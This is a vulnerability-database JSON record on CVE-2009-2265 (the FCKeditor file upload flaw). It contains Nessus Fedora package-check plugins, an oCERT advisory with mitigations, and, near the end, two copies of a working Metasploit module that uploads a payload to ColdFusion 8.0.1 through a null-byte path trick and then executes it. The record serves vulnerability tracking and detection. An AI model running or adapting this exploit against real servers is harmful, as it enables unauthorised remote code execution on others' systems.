Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.5-1\n\n - 1.8.5\n\n - Includes multiple bug fixes, a new FCKeditor version\n and some new features\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.5/docs/CHANG\n ES\n\n - Sat Jul 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 1.8.4-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n\n - Sun Jul 12 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> 1.8.4-2\n\n - Remove the filemanager directory from the embedded\n FCKeditor, it contains code with know security\n vulnerabilities, even though that code couldn't be\n invoked when moin was used with the default settings.\n\n - Fixes rhbz #509924, related to CVE-2009-2265\n\n - Sat Jun 13 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> 1.8.4-1\n\n - Update to 1.8.4, http://moinmo.in/MoinMoinRelease1.8\n has a list of changes.\n\n - Includes a security fix for hierarchical ACL (not the\n default mode), http://moinmo.in/SecurityFixes has the\n details.\n\n - Drop previous security patches, those are not needed\n anymore.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2010-07-01T00:00:00", "title": "Fedora 11 : moin-1.8.7-2.fc11 (2010-6012)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "modified": "2010-07-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moin", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2010-6012.NASL", "href": "https://www.tenable.com/plugins/nessus/47409", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-6012.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47409);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-0828\");\n script_bugtraq_id(39110);\n script_xref(name:\"FEDORA\", value:\"2010-6012\");\n script_xref(name:\"Secunia\", value:\"38444\");\n\n script_name(english:\"Fedora 11 : moin-1.8.7-2.fc11 (2010-6012)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Apr 3 2010 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.7-2\n\n - Fixes CVE-2010-0828 (rhbz#578801)\n\n - Thu Feb 18 2010 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.7-1\n\n - Fixed major security issues in miscellaneous parts of\n moin\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.7/docs/CHANG\n ES\n\n - http://secunia.com/advisories/38444/\n\n - Fixes rhbz#565604\n\n - Mon Dec 28 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.6-1\n\n - 1.8.6, mostly bug fixes\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.6/docs/CHANG\n ES\n\n - Tue Sep 15 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.5-1\n\n - 1.8.5\n\n - Includes multiple bug fixes, a new FCKeditor version\n and some new features\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.5/docs/CHANG\n ES\n\n - Sat Jul 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 1.8.4-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n\n - Sun Jul 12 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> 1.8.4-2\n\n - Remove the filemanager directory from the embedded\n FCKeditor, it contains code with know security\n vulnerabilities, even though that code couldn't be\n invoked when moin was used with the default settings.\n\n - Fixes rhbz #509924, related to CVE-2009-2265\n\n - Sat Jun 13 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> 1.8.4-1\n\n - Update to 1.8.4, http://moinmo.in/MoinMoinRelease1.8\n has a list of changes.\n\n - Includes a security fix for hierarchical ACL (not the\n default mode), http://moinmo.in/SecurityFixes has the\n details.\n\n - Drop previous security patches, those are not needed\n anymore.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.8/raw-file/1.8.5/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.8/raw-file/1.8.6/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.8/raw-file/1.8.7/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/MoinMoinRelease1.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=578801\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-April/038490.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1ebc367\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected moin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"moin-1.8.7-2.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:07:31", "description": "The remote Fedora host is missing one or more security updates :\n\nmoin-1.8.4-2.fc11 :\n\nThis update removes the filemanager directory from the embedded\nFCKeditor, it contains code with know security vulnerabilities, even\nthough that code couldn't be invoked when Moin was used with the\ndefault settings. Moin was probably not affected, but installing this\nupdate is still recommended as a security measure. CVE-2009-2265 is\nthe related CVE identifier.\n\nwxGTK-2.8.10-2.fc10 :\n\nadded fix for CVE-2009-2369\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 10 : wxGTK-2.8.10-2.fc10 / Fedora 11 : moin-1.8.4-2.fc11 (2009-7794)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2009-2369"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:wxGTK", "p-cpe:/a:fedoraproject:fedora:moin", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-7794.NASL", "href": "https://www.tenable.com/plugins/nessus/39866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7794.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39866);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2265\");\n script_bugtraq_id(31812, 35552);\n script_xref(name:\"FEDORA\", value:\"2009-7794\");\n\n script_name(english:\"Fedora 10 : wxGTK-2.8.10-2.fc10 / Fedora 11 : moin-1.8.4-2.fc11 (2009-7794)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Fedora host is missing one or more security updates :\n\nmoin-1.8.4-2.fc11 :\n\nThis update removes the filemanager directory from the embedded\nFCKeditor, it contains code with know security vulnerabilities, even\nthough that code couldn't be invoked when Moin was used with the\ndefault settings. Moin was probably not affected, but installing this\nupdate is still recommended as a security measure. CVE-2009-2265 is\nthe related CVE identifier.\n\nwxGTK-2.8.10-2.fc10 :\n\nadded fix for CVE-2009-2369\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=509924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511279\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026679.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f0cacb5\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026815.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bdc90a82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moin and / or wxGTK packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wxGTK\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(10|11)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x / 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"wxGTK-2.8.10-2.fc10\")) flag++;\n\nif (rpm_check(release:\"FC11\", reference:\"moin-1.8.4-2.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin / wxGTK\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-2265"], "description": "\r\n#2009-007 FCKeditor input sanitization errors\r\n\r\nDescription:\r\n\r\nFCKeditor, a web based open source HTML text editor, suffers from a remote\r\nfile upload vulnerability.\r\n\r\nThe input of several connector modules is not properly verified before being\r\nused, this leads to exposure of the contents of arbitrary directories on the\r\nserver filesystem and allows file uploading to arbitrary locations. The\r\naffected code is remotely exposed before authentication. An attacker can\r\nexploit this vulnerability to install remote shells on the victim server\r\namong other things, it should be noted that this vulnerability is being\r\nactively exploited in the wild.\r\n\r\nAdditionally several XSS vulnerabilities are present in the packaged samples\r\ndirectory.\r\n\r\nA patch and a new FCKeditor version will be made available on Monday July 6th\r\n16:00 CET, this advisory will be updated with detailed information about the\r\nissue and a security patch.\r\n\r\nIn the meantime we strongly recommend to implement the following\r\nmitigation instructions:\r\n\r\n * removed unused connectors from &#39;editor&#92;filemanager&#92;connectors&#39;\r\n\r\n * disable the file browser in config.ext\r\n\r\n * inspect all fckeditor folders on the server for suspicious files that\r\n may have been previously uploaded, as an example image directories\r\n &#40;eg. &#39;fckeditor/editor/images/...&#39;&#41; are well known target locations\r\n for remote php shells with extensions that match image files\r\n\r\n * completely remove the &#39;_samples&#39; directory\r\n\r\nAffected version:\r\n\r\nFCKeditor &lt;= 2.6.4\r\n\r\n&#40;version 3.0 is unaffected as it does not have any built-in file browser&#41;\r\n\r\nFixed version:\r\n\r\nFCKeditor &gt;= 2.6.4.1 &#40;to be released on 2009-07-06 16:00 CET&#41;\r\n\r\nCredit: vulnerability report received from Vinny Guido &lt;bigvin [at]\r\n hushmail [dot] com&gt;.\r\n\r\nCVE: CVE-2009-2265\r\n\r\nTimeline:\r\n\r\n2009-05-03: vulnerability reported received\r\n2009-05-04: contacted fckeditor maintainer\r\n2009-05-25: maintainer denies reported issues against latest version\r\n2009-05-25: reporter confirms that latest version is affected\r\n2009-06-21: maintainer forwards report to project security maintainer\r\n2009-06-23: security maintainer confirms CurrentFolder vulnerability\r\n2009-06-24: security maintainer provides patch\r\n2009-06-29: assigned CVE\r\n2009-07-03: preliminary advisory release with mitigation instructions due to\r\n wide exposure of the issue\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2009-007.html\r\n\r\n-- \r\nAndrea Barisani | Founder &amp; Project Coordinator\r\n oCERT | Open Source Computer Emergency Response Team\r\n\r\n&lt;lcars@ocert.org&gt; http://www.ocert.org\r\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\r\n &quot;Pluralitas non est ponenda sine necessitate&quot;", "edition": 1, "modified": "2009-07-03T00:00:00", "published": "2009-07-03T00:00:00", "id": "SECURITYVULNS:DOC:22121", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22121", "title": "[oCERT-2009-007] FCKeditor input sanitization errors", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-2265", "CVE-2009-2288"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-07-03T00:00:00", "published": "2009-07-03T00:00:00", "id": "SECURITYVULNS:VULN:10034", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10034", "title": "Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-03-18T20:17:09", "description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.\n", "published": "2010-11-02T20:13:36", "type": "metasploit", "title": "ColdFusion 8.0.1 Arbitrary File Upload and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2265"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/COLDFUSION_FCKEDITOR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',\n 'Description' => %q{\n This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Privileged' => true,\n 'References' =>\n [\n [ 'CVE', '2009-2265' ],\n [ 'OSVDB', '55684'],\n ],\n 'Targets' =>\n [\n [ 'Universal Windows Target',\n {\n 'Arch' => ARCH_JAVA,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n }\n ],\n ],\n 'DefaultOptions' =>\n {\n 'SHELL' => 'cmd.exe'\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 3 2009'\n ))\n\n register_options(\n [\n OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),\n ])\n end\n\n def exploit\n\n page = rand_text_alpha_upper(rand(10) + 1) + \".jsp\"\n\n dbl = Rex::MIME::Message.new\n dbl.add_part(payload.encoded, \"application/x-java-archive\", nil, \"form-data; name=\\\"newfile\\\"; filename=\\\"#{rand_text_alpha_upper(8)}.txt\\\"\")\n file = dbl.to_s\n file.strip!\n\n print_status(\"Sending our POST request...\")\n\n res = send_request_cgi(\n {\n 'uri'\t\t=> normalize_uri(datastore['FCKEDITOR_DIR']),\n 'query'\t\t=> \"Command=FileUpload&Type=File&CurrentFolder=/#{page}%00\",\n 'version'\t=> '1.1',\n 'method'\t=> 'POST',\n 'ctype'\t\t=> 'multipart/form-data; boundary=' + dbl.bound,\n 'data'\t\t=> file,\n }, 5)\n\n if ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )\n print_status(\"Upload succeeded! Executing payload...\")\n\n send_request_raw(\n {\n # default path in Adobe ColdFusion 8.0.1.\n 'uri'\t\t=> '/userfiles/file/' + page,\n 'method'\t=> 'GET',\n }, 5)\n\n handler\n else\n print_error(\"Upload Failed...\")\n return\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/coldfusion_fckeditor.rb"}], "exploitdb": [{"lastseen": "2016-02-02T06:30:37", "description": "ColdFusion 8.0.1 Arbitrary File Upload and Execute. CVE-2009-2265. Webapps exploit for cfm platform", "published": "2010-11-24T00:00:00", "type": "exploitdb", "title": "ColdFusion 8.0.1 - Arbitrary File Upload and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2265"], "modified": "2010-11-24T00:00:00", "id": "EDB-ID:16788", "href": "https://www.exploit-db.com/exploits/16788/", "sourceData": "##\r\n# $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\r\n\t\t\t\tand Execute vulnerability.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11127 $',\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-2265' ],\r\n\t\t\t\t\t[ 'OSVDB', '55684'],\r\n\t\t\t\t],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Universal Windows Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Payload' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t\t\t\t},\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 3 2009'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t\tOptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tpage = rand_text_alpha_upper(rand(10) + 1) + \".jsp\"\r\n\r\n\t\tdbl = Rex::MIME::Message.new\r\n\t\tdbl.add_part(payload.encoded, \"application/x-java-archive\", nil, \"form-data; name=\\\"newfile\\\"; filename=\\\"#{rand_text_alpha_upper(8)}.txt\\\"\")\r\n\t\tfile = dbl.to_s\r\n\t\tfile.strip!\r\n\r\n\t\tprint_status(\"Sending our POST request...\")\r\n\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri'\t\t=> \"#{datastore['FCKEDITOR_DIR']}\",\r\n\t\t\t\t'query'\t\t=> \"Command=FileUpload&Type=File&CurrentFolder=/#{page}%00\",\r\n\t\t\t\t'version'\t=> '1.1',\r\n\t\t\t\t'method'\t=> 'POST',\r\n\t\t\t\t'ctype'\t\t=> 'multipart/form-data; boundary=' + dbl.bound,\r\n\t\t\t\t'data'\t\t=> file,\r\n\t\t\t}, 5)\r\n\r\n\t\tif ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )\r\n\t\t\tprint_status(\"Upload succeeded! Executing payload...\")\r\n\r\n\t\t\tsend_request_raw(\r\n\t\t\t\t{\r\n\t\t\t\t\t# default path in Adobe ColdFusion 8.0.1.\r\n\t\t\t\t\t'uri'\t\t=> '/userfiles/file/' + page,\r\n\t\t\t\t\t'method'\t=> 'GET',\r\n\t\t\t\t}, 5)\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_error(\"Upload Failed...\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16788/"}], "seebug": [{"lastseen": "2017-11-19T18:45:02", "description": "CVE(CAN) ID: CVE-2009-2324,CVE-2009-2265\r\n\r\nFCKeditor\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u7801\u7684HTML\u6587\u672c\u7f16\u8f91\u5668\u3002\r\n\r\nFCKeditor\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u7528\u6237\u5bf9\u591a\u4e2aconnector\u6a21\u5757\u6240\u4f20\u9001\u7684\u8f93\u5165\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528samples\u76ee\u5f55\u4e2d\u7684\u7ec4\u4ef6\u6ce8\u5165\u4efb\u610f\u811a\u672c\u6216HTML\uff0c\u6216\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u653b\u51fb\u4e0a\u4f20\u6076\u610f\u6587\u4ef6\u3002\r\n\r\nFCKeditor <= 2.6.4\r\n* \u4eceeditor\\filemanager\\connectors\u4e2d\u5220\u9664\u4e0d\u4f7f\u7528\u7684\u8fde\u63a5\u5668\r\n* \u5728config.ext\u4e2d\u7981\u7528\u6587\u4ef6\u6d4f\u89c8\u5668\r\n* \u5b8c\u5168\u5220\u9664_samples\u76ee\u5f55\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nFCKeditor\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.fckeditor.net/", "published": "2009-07-07T00:00:00", "type": "seebug", "title": "FCKeditor connectors\u6a21\u5757\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u53ca\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2265", "CVE-2009-2324"], "modified": "2009-07-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11759", "id": "SSV:11759", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}